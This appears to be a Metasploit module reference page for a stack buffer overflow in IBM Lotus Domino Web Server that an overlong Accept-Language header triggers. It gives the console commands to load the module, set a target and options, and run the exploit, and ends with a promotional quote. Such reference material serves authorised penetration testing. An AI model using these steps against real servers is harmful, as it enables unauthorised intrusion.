This module exploits a stack buffer overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes.
Windows
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/lotus/domino_http_accept_language
msf exploit(domino_http_accept_language) > show targets
...targets...
msf exploit(domino_http_accept_language) > set TARGET < target-id >
msf exploit(domino_http_accept_language) > show options
...show and set options...
msf exploit(domino_http_accept_language) > exploit
Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
– Jim O’Gorman | President, Offensive Security